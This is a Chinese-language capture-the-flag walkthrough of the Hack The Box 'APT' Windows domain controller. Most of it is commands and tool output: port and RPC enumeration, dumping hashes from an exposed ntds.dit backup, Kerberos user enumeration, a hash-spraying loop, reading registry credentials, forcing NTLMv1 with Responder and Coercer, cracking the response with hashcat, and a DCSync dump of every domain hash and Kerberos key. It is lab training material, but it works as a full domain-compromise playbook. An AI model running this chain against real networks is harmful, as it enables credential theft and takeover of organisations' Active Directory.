HTB-APT靶机
信息搜集
nmap
$ nmap --min-rate 10000 -p- -oA nmapscan/ports 10.129.96.60
Nmap scan report for gigantichosting.com (10.129.96.60)
Host is up (0.91s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
$ nmap -sT -sC -sV -O -p80,135 -oA nmapscan/detail 10.129.96.60
Nmap scan report for 10.129.96.60
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|2016 (90%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
知道操作系统是Windows,80和135开放。
Web-80
这个网站里有很多静态内容。阅读源码发现一行注释:
<!-- Mirrored from 10.13.38.16/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 23 Dec 2019 08:13:45 GMT -->
可能来自某个网站的镜像。但是这对我们目前的进度没有任何帮助。
网站没有任何有意思的东西,目录爆破也没有发现敏感文件:
./feroxbuster -u http://10.129.96.60/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.96.60/
🚩 In-Scope Url │ 10.129.96.60
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 29l 95w 1245c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 2l 10w 147c http://10.129.96.60/css => http://10.129.96.60/css/
301 GET 2l 10w 146c http://10.129.96.60/js => http://10.129.96.60/js/
301 GET 2l 10w 150c http://10.129.96.60/images => http://10.129.96.60/images/
200 GET 50l 118w 1268c http://10.129.96.60/js/nav.js
200 GET 21l 97w 7075c http://10.129.96.60/images/c-logo1.png
200 GET 147l 412w 5528c http://10.129.96.60/news.html
200 GET 357l 990w 8188c http://10.129.96.60/css/owl.carousel.css
200 GET 24l 156w 11339c http://10.129.96.60/images/c-logo4.png
200 GET 243l 870w 10592c http://10.129.96.60/services.html
200 GET 23l 133w 10584c http://10.129.96.60/images/c-logo.png
200 GET 347l 1094w 14879c http://10.129.96.60/index.html
200 GET 33l 144w 12681c http://10.129.96.60/images/c-logo5.png
200 GET 23l 123w 9804c http://10.129.96.60/images/c-logo3.png
200 GET 155l 468w 6326c http://10.129.96.60/support.html
200 GET 274l 958w 12146c http://10.129.96.60/clients.html
200 GET 21l 187w 12696c http://10.129.96.60/images/logo.png
200 GET 211l 718w 9386c http://10.129.96.60/about.html
200 GET 33l 161w 11330c http://10.129.96.60/images/c-logo6.png
200 GET 4l 48w 17807c http://10.129.96.60/fonts/css/font-awesome.min.css
200 GET 1470l 3315w 37908c http://10.129.96.60/js/owl.carousel.js
200 GET 1585l 3117w 28067c http://10.129.96.60/css/style.css
301 GET 2l 10w 150c http://10.129.96.60/Images => http://10.129.96.60/Images/
200 GET 4l 1421w 96381c http://10.129.96.60/js/jquery.min.js
200 GET 5785l 13825w 121276c http://10.129.96.60/css/bootstrap.css
200 GET 347l 1094w 14879c http://10.129.96.60/
301 GET 2l 10w 149c http://10.129.96.60/fonts => http://10.129.96.60/fonts/
403 GET 29l 92w 1233c http://10.129.96.60/fonts/
301 GET 2l 10w 153c http://10.129.96.60/fonts/css => http://10.129.96.60/fonts/css/
403 GET 29l 92w 1233c http://10.129.96.60/fonts/css/
301 GET 2l 10w 147c http://10.129.96.60/CSS => http://10.129.96.60/CSS/
403 GET 29l 92w 1233c http://10.129.96.60/fonts/fonts/
301 GET 2l 10w 155c http://10.129.96.60/fonts/fonts => http://10.129.96.60/fonts/fonts/
301 GET 2l 10w 153c http://10.129.96.60/fonts/CSS => http://10.129.96.60/fonts/CSS/
301 GET 2l 10w 146c http://10.129.96.60/JS => http://10.129.96.60/JS/
301 GET 2l 10w 146c http://10.129.96.60/Js => http://10.129.96.60/Js/
301 GET 2l 10w 147c http://10.129.96.60/Css => http://10.129.96.60/Css/
301 GET 2l 10w 153c http://10.129.96.60/fonts/Css => http://10.129.96.60/fonts/Css/
301 GET 2l 10w 150c http://10.129.96.60/IMAGES => http://10.129.96.60/IMAGES/
301 GET 2l 10w 149c http://10.129.96.60/Fonts => http://10.129.96.60/Fonts/
301 GET 2l 10w 153c http://10.129.96.60/Fonts/css => http://10.129.96.60/Fonts/css/
301 GET 2l 10w 155c http://10.129.96.60/fonts/Fonts => http://10.129.96.60/fonts/Fonts/
403 GET 29l 92w 1233c http://10.129.96.60/Fonts/Fonts/
301 GET 2l 10w 155c http://10.129.96.60/Fonts/fonts => http://10.129.96.60/Fonts/fonts/
301 GET 2l 10w 153c http://10.129.96.60/Fonts/CSS => http://10.129.96.60/Fonts/CSS/
301 GET 2l 10w 153c http://10.129.96.60/Fonts/Css => http://10.129.96.60/Fonts/Css/
301 GET 2l 10w 155c http://10.129.96.60/Fonts/Fonts => http://10.129.96.60/Fonts/Fonts/
400 GET 6l 26w 324c http://10.129.96.60/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/images/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/js/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Images/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/CSS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/JS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/CSS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Js/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/Css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/IMAGES/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/css/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/fonts/Fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/Fonts/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/CSS/error%1F_log
400 GET 6l 26w 324c http://10.129.96.60/Fonts/Css/error%1F_log
[####################] - 4m 660085/660085 0s found:68 errors:26
[####################] - 4m 30000/30000 138/s http://10.129.96.60/
[####################] - 4m 30000/30000 140/s http://10.129.96.60/css/
[####################] - 4m 30000/30000 139/s http://10.129.96.60/js/
[####################] - 4m 30000/30000 139/s http://10.129.96.60/images/
[####################] - 4m 30000/30000 138/s http://10.129.96.60/fonts/
[####################] - 4m 30000/30000 138/s http://10.129.96.60/fonts/css/
[####################] - 4m 30000/30000 139/s http://10.129.96.60/Images/
[####################] - 4m 30000/30000 140/s http://10.129.96.60/fonts/fonts/
[####################] - 4m 30000/30000 140/s http://10.129.96.60/CSS/
[####################] - 4m 30000/30000 141/s http://10.129.96.60/fonts/CSS/
[####################] - 4m 30000/30000 142/s http://10.129.96.60/JS/
[####################] - 4m 30000/30000 143/s http://10.129.96.60/Js/
[####################] - 4m 30000/30000 143/s http://10.129.96.60/Css/
[####################] - 4m 30000/30000 143/s http://10.129.96.60/fonts/Css/
[####################] - 3m 30000/30000 144/s http://10.129.96.60/IMAGES/
[####################] - 3m 30000/30000 146/s http://10.129.96.60/Fonts/
[####################] - 3m 30000/30000 146/s http://10.129.96.60/Fonts/css/
[####################] - 3m 30000/30000 146/s http://10.129.96.60/fonts/Fonts/
[####################] - 3m 30000/30000 145/s http://10.129.96.60/Fonts/Fonts/
[####################] - 3m 30000/30000 147/s http://10.129.96.60/Fonts/fonts/
[####################] - 3m 30000/30000 147/s http://10.129.96.60/Fonts/CSS/
[####################] - 3m 30000/30000 151/s http://10.129.96.60/Fonts/Css/
现在视线应该转向135端口。
RPC-135
通过查询 RPC 定位器服务和各个端点,可以确定 TCP、UDP、HTTP 和 SMB 协议中 RPC 服务的暴露情况。诸如 rpcdump 之类的工具可以帮助识别由 IFID 值表示的唯一 RPC 服务,从而揭示服务详情和通信绑定:
rpcdump.py 10.129.96.60
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Retrieving endpoint list from 10.129.96.60
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
ncacn_ip_tcp:10.129.96.60[49664]
ncalrpc:[WindowsShutdown]
ncacn_np:\\APT[\PIPE\InitShutdown]
ncalrpc:[WMsgKRpc06EBC0]
............
............
[*] Received 266 endpoints.
使用 IOXIDResolver 识别目标的IP地址:
python3 IOXIDResolver.py -t 10.129.96.60
[*] Retrieving network interface of 10.129.96.60
Address: apt
Address: 10.129.96.60
Address: dead:beef::18d3:cd16:e553:73c4
Address: dead:beef::b885:d62a:d679:573f
IPV6 & nmap
将 IPV6 地址添加到 hosts 文件中,再使用nmap扫描一遍,发现更多开放端口。
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49673/tcp open unknown
49685/tcp open unknown
58200/tcp open unknown
smb-445
可以匿名访问smb:
$ netexec smb -6 htb.local -u '' -p '' --shares
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [+] htb.local\:
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [*] Enumerated shares
SMB dead:beef::18d3:cd16:e553:73c4 445 APT Share Permissions Remark
SMB dead:beef::18d3:cd16:e553:73c4 445 APT ----- ----------- ------
SMB dead:beef::18d3:cd16:e553:73c4 445 APT backup READ
SMB dead:beef::18d3:cd16:e553:73c4 445 APT IPC$ Remote IPC
SMB dead:beef::18d3:cd16:e553:73c4 445 APT NETLOGON Logon server share
SMB dead:beef::18d3:cd16:e553:73c4 445 APT SYSVOL Logon server share
值得注意的是 backup 文件夹,里面有一个backup.zip文件。
$ unzip -l backup.zip
Archive: backup.zip
Length Date Time Name
--------- ---------- ----- ----
0 2020-09-23 19:40 Active Directory/
50331648 2020-09-23 19:38 Active Directory/ntds.dit
16384 2020-09-23 19:38 Active Directory/ntds.jfm
0 2020-09-23 19:40 registry/
262144 2020-09-23 19:22 registry/SECURITY
12582912 2020-09-23 19:22 registry/SYSTEM
--------- -------
63193088 6 files
通过工具爆破出压缩包密码iloveyousomuch,使用该密码将内容解压。
henry.vinson_adm
通过搜索发现压缩包内的文件可以离线导出用户哈希。
$ secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL > backup_ad_dump
$ cat backup_ad_dump
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
APT$:1000:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb:::
............
............
尝试使用 psexc.py 以及 evil-winrm 获取 admin 哈希并登录,但是都无法登录。
有效用户爆破
用户数太多,足足两千个,我需要知道哪些用户是有效的。TCP88 开放,使用 Kerbrute 来检测有效用户。
提取出所有用户名:
$ cat userr.txt
Administrator
Guest
krbtgt
DefaultAccount
jeb.sloan
ranson.mejia
unice.daugherty
............
............
kerbrute爆破:
$ ./kerbrute_linux_amd64 userenum -d htb.local --dc apt.htb ~/notes/HTB/APT/userr.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/07/26 - Ronnie Flathers @ropnop
2026/01/07 01:42:48 > Using KDC(s):
2026/01/07 01:42:48 > apt.htb:88
2026/01/07 01:42:55 > [+] VALID USERNAME: Administrator@htb.local
2026/01/07 01:47:28 > [+] VALID USERNAME: henry.vinson@htb.local
2026/01/07 02:03:10 > [+] VALID USERNAME: APT$@htb.local
2026/01/07 02:03:10 > Done! Tested 2000 usernames (3 valid) in 1221.316 seconds
APT的域中只有三个账户是有效的。分别是 admin、APT$、henry.vinson。鉴于当前环境上下文,优先以 henry.vinson 用户以及此用户对应的哈希进行身份验证。
$ netexec smb -6 htb.local -u henry.vinson -H 2de80758521541d19cabba480b260e8f
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB dead:beef::18d3:cd16:e553:73c4 445 APT [-] htb.local\henry.vinson:2de80758521541d19cabba480b260e8f STATUS_LOGON_FAILURE
不幸的是,哈希值无效。
哈希重用
考虑是否有其他哈希可以作用于 henry.vinson,netexec 爆破到达一定次数之后完全停止响应。猜测可能有防御机制把请求隔离了。尝试其他工具,如 getTGT.py、pyKerbrute。
getTGT.py 是只要用户名和哈希正确,就能申请 TGT,并在当前目录生成一个凭据。
#!/bin/bash
while IFS='' read -r LIME || [ -n "${LIME}"]
do
echo "Feed the Hash"
getTGT.py htb.local/henry.vinson@htb.local -hashes :${LIME}
done < hashh.txt
监控有没有产生文件:
watch "ls -lrt | tail -2"
pyKerbrute 接收一个用户列表和一个哈希值,并对所有用户进行 Kerberos 身份验证。可以对其进行简单修改,通过单一用户和多个哈希进行爆破。
最后获得一组匹配的哈希: henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
reg.py
再次尝试使用 psexc.py 以及 evil-winrm 进行身份验证。可惜的是 henry.vinson 没有 WinRM 权限,也不是管理员(因此无法使用 psexec )。
但是仍然可以做一些事情。比如提取注册表内容:
$ reg.py -hashes ':e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
HKU这个主键下存的都是用户相关的信息。在 HKU 里发现了一组凭据。
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
由此可以通过 WinRM 远程登录并在 C:\Users\henry.vinson_adm\desktop 拿到 user.txt。
administartor
当前机器只有两个活动用户:henry.vinson、henry.vinson_adm。一个管理员用户。
找到一个 powershell 历史记录文件:
$ ls C:\Users\henry.vinson_adm\AppData\Roaming\microsoft\windows\powershell\PSREadline
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/10/2020 10:58 AM 458 ConsoleHost_history.txt
里面的内容很感兴趣:
$Cred = get-credential administrator
invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
这更像是靶机故意给我们的提示。lmcompatibilitylevel 是 Windows 的身份验证安全策略,控制系统允许使用哪些 NTLM/LM 认证方式。现在这个值为2,告诉我们机器使用 NTLMv1 进行身份验证,而 NTLMv1 又非常不安全。
在 APT 上确认是否已这样设置:
*Evil-WinRM* PS C:\> Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel
lmcompatibilitylevel : 2
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
PSChildName : Lsa
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Responder
使用Coercer和 Responder获取 Net-NTLMv1 。找到Responder.conf ,将挑战码设置为 1122334455667788。
根据文档,使用 --lm 参数强制降级:
$ sudo responder -I tun0 --lm
$ sudo coercer coerce -l 10.10.11.200 -t dead:beef::18d3:cd16:e553:73c4 -u administrator -p G1#Ny5@2dvht -d local.htb
收到challenge:
[SMB] NTLMv1 Client : 10.129.4.8
[SMB] NTLMv1 Username : HTB\APT$
[SMB] NTLMv1 Hash : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
现在把它提交到 crack.sh 当中,或者使用 hashcat 进行破解:
hashcat -m 14000 -a 3 -1 DES_full.charset --hex-charset hashcat.txt ?1?1?1?1?1?1?1?1
最后的哈希为:d167c3238864b12f5f82feae86a7f798
Dump
这组哈希无法 evil 登录。但是可以执行 dnsync 攻击。
$ secretsdump.py local.htb/apt\$@local.htb -target-ip dead:beef::18d3:cd16:e553:73c4-hashes :d167c3238864b12f5f82feae86a7f798
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
[*] Cleaning up...
获得了AD 中其余帐户的哈希值。administrator 的哈希成功登录。
在 C:\Users\Administrator\desktop 中获得 root.txt
浙公网安备 33010602011771号